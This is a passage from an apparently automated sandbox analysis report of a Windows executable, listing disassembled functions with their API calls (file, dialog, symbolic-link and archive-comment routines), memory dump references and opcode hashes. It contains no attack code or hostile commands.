                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 8e38f4171aefb9f5c4f673c52851a1b9ff1e5b803cc84432502971805913f3ec
                                                                                    • Instruction ID: 69f4f250c6bcc119741bee9e973a197acc378ca7397d27353273cd509f7c3d53
                                                                                    • Opcode Fuzzy Hash: 8e38f4171aefb9f5c4f673c52851a1b9ff1e5b803cc84432502971805913f3ec
                                                                                    • Instruction Fuzzy Hash: C1B0129129C0016E3148F1445E02C37110EC7C0B20370841FB4C0D2140FB804D698A72
                                                                                    Function 0016C75A Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C738
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: d96b04eaee887e6bee36e43188483775220f0fae779f09797e0c51decca3e29b
                                                                                    • Instruction ID: 6473c4c21d4736a9f9556ebee79b12add9c5aa85629acbb79ef9616bbfe3022a
                                                                                    • Opcode Fuzzy Hash: d96b04eaee887e6bee36e43188483775220f0fae779f09797e0c51decca3e29b
                                                                                    • Instruction Fuzzy Hash: 78A011A22A800ABC3088B280AC03C3B020CC0C0B20330880EB88280080BB8008208AB0
                                                                                    Function 0016C778 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C738
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: cd6cee604e1840af6fd94cd984d25a5c6133886b28eceae31dc8fd3b78a776b1
                                                                                    • Instruction ID: 6473c4c21d4736a9f9556ebee79b12add9c5aa85629acbb79ef9616bbfe3022a
                                                                                    • Opcode Fuzzy Hash: cd6cee604e1840af6fd94cd984d25a5c6133886b28eceae31dc8fd3b78a776b1
                                                                                    • Instruction Fuzzy Hash: 78A011A22A800ABC3088B280AC03C3B020CC0C0B20330880EB88280080BB8008208AB0
                                                                                    Function 0016C76E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C738
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 576574a5ef89e52954a0c608e2eea2075aa4eafaaf9bd2788fdbd048f0c76c00
                                                                                    • Instruction ID: 6473c4c21d4736a9f9556ebee79b12add9c5aa85629acbb79ef9616bbfe3022a
                                                                                    • Opcode Fuzzy Hash: 576574a5ef89e52954a0c608e2eea2075aa4eafaaf9bd2788fdbd048f0c76c00
                                                                                    • Instruction Fuzzy Hash: 78A011A22A800ABC3088B280AC03C3B020CC0C0B20330880EB88280080BB8008208AB0
                                                                                    Function 0016C782 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C738
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 3fdae64214cbe87a6abd0776a1f8d3c3c9c50d5bd547f08b01f37e7cecfdb2a8
                                                                                    • Instruction ID: 6473c4c21d4736a9f9556ebee79b12add9c5aa85629acbb79ef9616bbfe3022a
                                                                                    • Opcode Fuzzy Hash: 3fdae64214cbe87a6abd0776a1f8d3c3c9c50d5bd547f08b01f37e7cecfdb2a8
                                                                                    • Instruction Fuzzy Hash: 78A011A22A800ABC3088B280AC03C3B020CC0C0B20330880EB88280080BB8008208AB0
                                                                                    Function 0016C7B1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C799
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: 3105fce14157fae207889b05616d64b49bd5fb3305e3e9c4d466aa49915118f8
                                                                                    • Instruction ID: d316e3c084d2e899067859f3e4ca6bf3cd918bdb851c0cfa497829a130537c52
                                                                                    • Opcode Fuzzy Hash: 3105fce14157fae207889b05616d64b49bd5fb3305e3e9c4d466aa49915118f8
                                                                                    • Instruction Fuzzy Hash: C7A011A22A8002BC3008B280AC02C3B220CC2C0B20330880EB88280080BB8008A088B0
                                                                                    Function 0016C7A7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0016C799
                                                                                      • Part of subcall function 0016CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0016CB39
                                                                                      • Part of subcall function 0016CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0016CB4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                    • String ID:
                                                                                    • API String ID: 1269201914-0
                                                                                    • Opcode ID: f352f1c829801405f4c5c20371037b1c0c234b184970cbc12a27c4161d6eb17c
                                                                                    • Instruction ID: d316e3c084d2e899067859f3e4ca6bf3cd918bdb851c0cfa497829a130537c52
                                                                                    • Opcode Fuzzy Hash: f352f1c829801405f4c5c20371037b1c0c234b184970cbc12a27c4161d6eb17c
                                                                                    • Instruction Fuzzy Hash: C7A011A22A8002BC3008B280AC02C3B220CC2C0B20330880EB88280080BB8008A088B0
                                                                                    Function 00159B6A Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetEndOfFile.KERNELBASE(?,00158EDB,?,?,-00001954), ref: 00159B6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: File
                                                                                    • String ID:
                                                                                    • API String ID: 749574446-0
                                                                                    • Opcode ID: 0a6ef18d7ecdfb9f56dfedc5ca9621bec85f3c5f3fd9c8658570092b3364f4fb
                                                                                    • Instruction ID: a3e2c9ecf5d287baa8b99a6fb636722acfd18bafc24535b8ba9747e836268bad
                                                                                    • Opcode Fuzzy Hash: 0a6ef18d7ecdfb9f56dfedc5ca9621bec85f3c5f3fd9c8658570092b3364f4fb
                                                                                    • Instruction Fuzzy Hash: B0B011300E080A8A8E822B30CC088203A20EB2230A30082A0B00AC80A0CB22C00AAB00
                                                                                    Function 00169023 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,0016927A,00192120,00000000,00193122,00000006), ref: 00169027
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID:
                                                                                    • API String ID: 1611563598-0
                                                                                    • Opcode ID: edb1eab5f0cdc8470dafaf7590340820c04e56548df277786cefd8a920cd40d1
                                                                                    • Instruction ID: 72a96c4e3c16de5d9e733be957dcd31bb4043d078b7e4e9605e225791a2f9615
                                                                                    • Opcode Fuzzy Hash: edb1eab5f0cdc8470dafaf7590340820c04e56548df277786cefd8a920cd40d1
                                                                                    • Instruction Fuzzy Hash: D2A0123019410A46CA410B30CC0DC1577505B60702F0086207002C00A0CB30C854E700
                                                                                    Function 001594A3 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,00159473), ref: 001594BE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle
                                                                                    • String ID:
                                                                                    • API String ID: 2962429428-0
                                                                                    • Opcode ID: 71764f80d98d6e9c06d2bf3b81a636b9c8ccd834a54a8dc58de408a5da40d726
                                                                                    • Instruction ID: c59e4153be6ca023155d79502d7669a19cdd594115f82821229b0bce5bd642b6
                                                                                    • Opcode Fuzzy Hash: 71764f80d98d6e9c06d2bf3b81a636b9c8ccd834a54a8dc58de408a5da40d726
                                                                                    • Instruction Fuzzy Hash: 8DF0BE30186B44CEDB308A24D609792B3E89B11723F048B1ED8FA4B8D0D371A84E8B52

                                                                                    Non-executed Functions

                                                                                    Function 0016A537 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 289timewindowfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 001512E7: GetDlgItem.USER32(00000000,00003021), ref: 0015132B
                                                                                      • Part of subcall function 001512E7: SetWindowTextW.USER32(00000000,001802E4), ref: 00151341
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0016A5C8
                                                                                    • EndDialog.USER32(?,00000006), ref: 0016A5DB
                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0016A5F7
                                                                                    • SetFocus.USER32(00000000), ref: 0016A5FE
                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0016A63E
                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0016A671
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0016A687
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0016A6A5
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0016A6B5
                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0016A6D2
                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0016A6F0
                                                                                      • Part of subcall function 0015D142: LoadStringW.USER32(?,?,00000200,?), ref: 0015D187
                                                                                      • Part of subcall function 0015D142: LoadStringW.USER32(?,?,00000200,?), ref: 0015D19D
                                                                                    • _swprintf.LIBCMT ref: 0016A720
                                                                                      • Part of subcall function 00153F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00153F6E
                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0016A733
                                                                                    • FindClose.KERNEL32(00000000), ref: 0016A736
                                                                                    • _swprintf.LIBCMT ref: 0016A791
                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0016A7A4
                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0016A7BA
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0016A7DA
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0016A7EA
                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0016A804
                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0016A81C
                                                                                    • _swprintf.LIBCMT ref: 0016A84D
                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0016A860
                                                                                    • _swprintf.LIBCMT ref: 0016A8B0
                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0016A8C3
                                                                                      • Part of subcall function 0016932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00169355
                                                                                      • Part of subcall function 0016932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,0018A154,?,?), ref: 001693A4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                    • API String ID: 3227067027-1840816070
                                                                                    • Opcode ID: 264e89c050e0234daf61614f6ff6492b6600d111b51b982104402e029c7b7012
                                                                                    • Instruction ID: 968711b027ae9374f8075dbfdc782627e00b56233d871de364ef6c9beb7da161
                                                                                    • Opcode Fuzzy Hash: 264e89c050e0234daf61614f6ff6492b6600d111b51b982104402e029c7b7012
                                                                                    • Instruction Fuzzy Hash: 2991A272548348BBE231DBA0CC89FFB77ACEF4A701F444819B646D6480D771AA498B63
                                                                                    Function 00157070 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 299fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00157075
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 001571D5
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001571E5
                                                                                      • Part of subcall function 00157A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00157AAC
                                                                                      • Part of subcall function 00157A9D: GetLastError.KERNEL32 ref: 00157AF2
                                                                                      • Part of subcall function 00157A9D: CloseHandle.KERNEL32(?), ref: 00157B01
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 001571F0
                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 001572FE
                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0015732A
                                                                                    • CloseHandle.KERNEL32(?), ref: 0015733C
                                                                                    • GetLastError.KERNEL32(00000015,00000000,?), ref: 0015734C
                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00157398
                                                                                    • DeleteFileW.KERNEL32(?), ref: 001573C0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                    • API String ID: 3935142422-3508440684
                                                                                    • Opcode ID: 0e85448d30343becea7f124309e13f73d35901725e157d374083872fe48861c3
                                                                                    • Instruction ID: 96f633f0d286ae9fe7d567b5441515f4356d8c8df5f4e1deb24774e881bdd555
                                                                                    • Opcode Fuzzy Hash: 0e85448d30343becea7f124309e13f73d35901725e157d374083872fe48861c3
                                                                                    • Instruction Fuzzy Hash: 7EB1B171904618EFDB21DF64DC46BEE77B8AF18301F144469FD29EB282D730AA49CB61
                                                                                    Function 00153203 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 604COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog_memcmp
                                                                                    • String ID: CMT$h%u$hc%u
                                                                                    • API String ID: 3004599000-3282847064
                                                                                    • Opcode ID: a1492db76934f3e65765e8b7ab71aca4ce1beb347689736f0fc86574a8bc5b9a
                                                                                    • Instruction ID: 62abc263b6f25d2a10f471f39f3d7d0a5e9a7bf8fc0eed3a3940f9e1cf8793ae
                                                                                    • Opcode Fuzzy Hash: a1492db76934f3e65765e8b7ab71aca4ce1beb347689736f0fc86574a8bc5b9a
                                                                                    • Instruction Fuzzy Hash: 2332BF71510384DFDB19DF64C886AEA3BA5AF25345F044479FDAA8F282DB709A4CCB60
                                                                                    Function 0017A35E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.00000000001AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1711274955.00000000001AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_150000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: __floor_pentium4
                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                    • API String ID: 4168288129-2761157908
                                                                                    • Opcode ID: d8d4714143d4381bb14c8ffed4165fdf45db687dc59d037f2559ccea3e87ca0d
                                                                                    • Instruction ID: 500e4f079faed7d2608365764baaa9eb09915eb8612cd0658b0f2c376757b379
                                                                                    • Opcode Fuzzy Hash: d8d4714143d4381bb14c8ffed4165fdf45db687dc59d037f2559ccea3e87ca0d
                                                                                    • Instruction Fuzzy Hash: 27C21971E086288BDB29CE28DD847EEB7B5EF84305F5581EAD44DE7240E774AE818F41
                                                                                    Function 0015276C Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 793COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog.LIBCMT ref: 00152775
                                                                                    • _strlen.LIBCMT ref: 00152CFF
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00152E56
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1710785670.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1710744661.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710923639.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1710977756.000000000018A000.00000004.00000001.01000000.00000003.sdmpDownload File
